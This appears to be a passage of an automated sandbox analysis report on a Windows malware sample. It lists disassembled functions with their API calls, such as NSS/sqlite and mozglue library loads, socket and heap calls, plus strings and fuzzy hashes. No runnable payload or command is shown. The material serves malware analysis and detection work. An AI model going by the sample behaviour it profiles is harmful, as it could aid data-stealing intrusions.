                                                                                                                                                                                            • Part of subcall function 00044954: __amsg_exit.LIBCMT ref: 00044964
                                                                                                                                                                                          • __getptd.LIBCMT ref: 0004673C
                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0004674A
                                                                                                                                                                                          • __lock.LIBCMT ref: 0004675A
                                                                                                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0004676E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 938513278-0
                                                                                                                                                                                          • Opcode ID: 375ad5f07305081d39901551e496cd10445d2e368cd61fbba22e3dd56979a083
                                                                                                                                                                                          • Instruction ID: 0a1c45064706e56b4498ffed418ac129d4cb476dd4fd1143ba132a686fb32462
                                                                                                                                                                                          • Opcode Fuzzy Hash: 375ad5f07305081d39901551e496cd10445d2e368cd61fbba22e3dd56979a083
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F0F6B2908720ABDB61BB68640779E33E06F00319F11056AF051A71D3EB295800D60E
                                                                                                                                                                                          Function 6C46B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C414290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C453EBD,6C453EBD,00000000), ref: 6C4142A9
                                                                                                                                                                                          • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C46B127), ref: 6C46B463
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C46B4C9
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C46B4E4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                          • String ID: pid:
                                                                                                                                                                                          • API String ID: 1720406129-3403741246
                                                                                                                                                                                          • Opcode ID: 348b2281fd8234c4ebe0d88d662b79e9b753837a42ef390e5a1ad6a0496502d1
                                                                                                                                                                                          • Instruction ID: 31c9709bb1abd3910016c230bf84d334d0ba49a2c787c9b229bd18a34ec64f60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 348b2281fd8234c4ebe0d88d662b79e9b753837a42ef390e5a1ad6a0496502d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB311031A012189BDB10DFAAD880EEEB7B9FF44318F54052DE84267F45D732A849DBE1
                                                                                                                                                                                          Function 00030077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0003009A
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC0D
                                                                                                                                                                                            • Part of subcall function 0004EBF8: __CxxThrowException@8.LIBCMT ref: 0004EC22
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC33
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00030139
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0003014D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                                          • String ID: vector<T> too long
                                                                                                                                                                                          • API String ID: 2448322171-3788999226
                                                                                                                                                                                          • Opcode ID: 25e147286ccaf25272b557bfd2d537b9237d2e3e7993e486c21dac92a86d708e
                                                                                                                                                                                          • Instruction ID: 0f1189639a2ad661406d6152db9bbc2390c284f52b55d843d0eeaa1ce7cbc60d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 25e147286ccaf25272b557bfd2d537b9237d2e3e7993e486c21dac92a86d708e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0310B72B413268BDB15EFACEC59AEE77E9E709310F02017AE514EB271D7709D808B51
                                                                                                                                                                                          Function 6C4C6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C4C6D36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4C6D20
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C4C6D2F
                                                                                                                                                                                          • database corruption, xrefs: 6C4C6D2A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                          • Opcode ID: 0c0c5832c2307c0276da5c6eb00986729043d8c1f75eafae8ef5d9ec3e946c5e
                                                                                                                                                                                          • Instruction ID: 10c549a48461fc5bd9a8b64f2d0120f046dc1437046391ce0159517823a63cd4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c0c5832c2307c0276da5c6eb00986729043d8c1f75eafae8ef5d9ec3e946c5e
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC21E2787043059BC710CE1AD841FAAB7F2AF84318F14892CD8499BF61E771F9858BA3
                                                                                                                                                                                          Function 6C5FCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C5FCC7B), ref: 6C5FCD7A
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C5FCD8E
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C5FCDA5
                                                                                                                                                                                            • Part of subcall function 6C5FCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C5FCDB8
                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C5FCCB5
                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C6914F4,6C6902AC,00000090), ref: 6C5FCCD3
                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C691588,6C6902AC,00000090), ref: 6C5FCD2B
                                                                                                                                                                                            • Part of subcall function 6C519AC0: socket.WSOCK32(?,00000017,6C5199BE), ref: 6C519AE6
                                                                                                                                                                                            • Part of subcall function 6C519AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5199BE), ref: 6C519AFC
                                                                                                                                                                                            • Part of subcall function 6C520590: closesocket.WSOCK32(6C519A8F,?,?,6C519A8F,00000000), ref: 6C520597
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                          • API String ID: 1231378898-412307543
                                                                                                                                                                                          • Opcode ID: 1b6f547d1f2b61c4dc1fc9884154c12dda749c17c0c0ff4ae840b65fcc6eb74b
                                                                                                                                                                                          • Instruction ID: b1f8e40bcf3f7e890c1d81a22f7e29c6f728f72316e649be73863f4ba6581306
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6f547d1f2b61c4dc1fc9884154c12dda749c17c0c0ff4ae840b65fcc6eb74b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6111AFF1B002429EDB009F5B9C86B423BAC9756318F319439E526CBB81E730D8058BDE
                                                                                                                                                                                          Function 0002F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F282
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC0D
                                                                                                                                                                                            • Part of subcall function 0004EBF8: __CxxThrowException@8.LIBCMT ref: 0004EC22
                                                                                                                                                                                            • Part of subcall function 0004EBF8: std::exception::exception.LIBCMT ref: 0004EC33
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F28D
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                                          • API String ID: 1823113695-4289949731
                                                                                                                                                                                          • Opcode ID: 159aaa7ab34ee69a8a2452d0c10ee2d7ac996cd28e3db2d96046a408c4c804bb
                                                                                                                                                                                          • Instruction ID: e69391ff3215ebba3e159bf10fcaee3a3a3169bd28b06be4e41f53907e63c084
                                                                                                                                                                                          • Opcode Fuzzy Hash: 159aaa7ab34ee69a8a2452d0c10ee2d7ac996cd28e3db2d96046a408c4c804bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78D012F5A0020CBBCB04E7D8DC169CEB6E9EF45711F100279AB06D3641EAB056008665
                                                                                                                                                                                          Function 00031D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00032301,?), ref: 00031D6C
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00031D73
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00031D84
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                          • String ID: %hs
                                                                                                                                                                                          • API String ID: 659108358-2783943728
                                                                                                                                                                                          • Opcode ID: a48b363243e28891a96cc6afb8e03d837fad565b79b0a3dc4fed41a2a2fde19e
                                                                                                                                                                                          • Instruction ID: 5bb725b06222f53f2401d9c222e5f749584837364680ac44d97e0d3d2d532f2b
                                                                                                                                                                                          • Opcode Fuzzy Hash: a48b363243e28891a96cc6afb8e03d837fad565b79b0a3dc4fed41a2a2fde19e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8D09E7174131477E75027D5AC0DB9F7F68DB057A3F000420FB0D96191D96A455447E5
                                                                                                                                                                                          Function 000213F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00021402
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0002140D
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00021416
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsCreateDeviceRelease
                                                                                                                                                                                          • String ID: DISPLAY
                                                                                                                                                                                          • API String ID: 1843228801-865373369
                                                                                                                                                                                          • Opcode ID: 19e0c8926b4647f24920bfd99ca1e85e955fb691e2cd7b70e9c85d06ce837546
                                                                                                                                                                                          • Instruction ID: e9340e0bb2eee824e3b9a23c2fb5fde1abdb1acffa75ece104dd3ba3031de864
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19e0c8926b4647f24920bfd99ca1e85e955fb691e2cd7b70e9c85d06ce837546
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBD0EA35784344BAF2B01765AD4EF6F2A64ABC6F13F201114FB06A91E48AA81446D626
                                                                                                                                                                                          Function 6C460C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C460CD5
                                                                                                                                                                                            • Part of subcall function 6C44F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C44F9A7
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C460D40
                                                                                                                                                                                          • free.MOZGLUE ref: 6C460DCB
                                                                                                                                                                                            • Part of subcall function 6C435E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C435EDB
                                                                                                                                                                                            • Part of subcall function 6C435E90: memset.VCRUNTIME140(ewGl,000000E5,?), ref: 6C435F27
                                                                                                                                                                                            • Part of subcall function 6C435E90: LeaveCriticalSection.KERNEL32(?), ref: 6C435FB2
                                                                                                                                                                                          • free.MOZGLUE ref: 6C460DDD
                                                                                                                                                                                          • free.MOZGLUE ref: 6C460DF2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4069420150-0
                                                                                                                                                                                          • Opcode ID: a78a36a17a5befbd54f6910ce1d92c8783809cbb634086070509a19f44b8012b
                                                                                                                                                                                          • Instruction ID: 785f594285a09023c30247e5f97288df2b39cb35d64a56cd8f87402512b4e028
                                                                                                                                                                                          • Opcode Fuzzy Hash: a78a36a17a5befbd54f6910ce1d92c8783809cbb634086070509a19f44b8012b
                                                                                                                                                                                          • Instruction Fuzzy Hash: E04115719097949BD720DF2AC080F9AFBE5BFC9714F118A2EE8D887B50D7709845CB82
                                                                                                                                                                                          Function 0002B021 Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
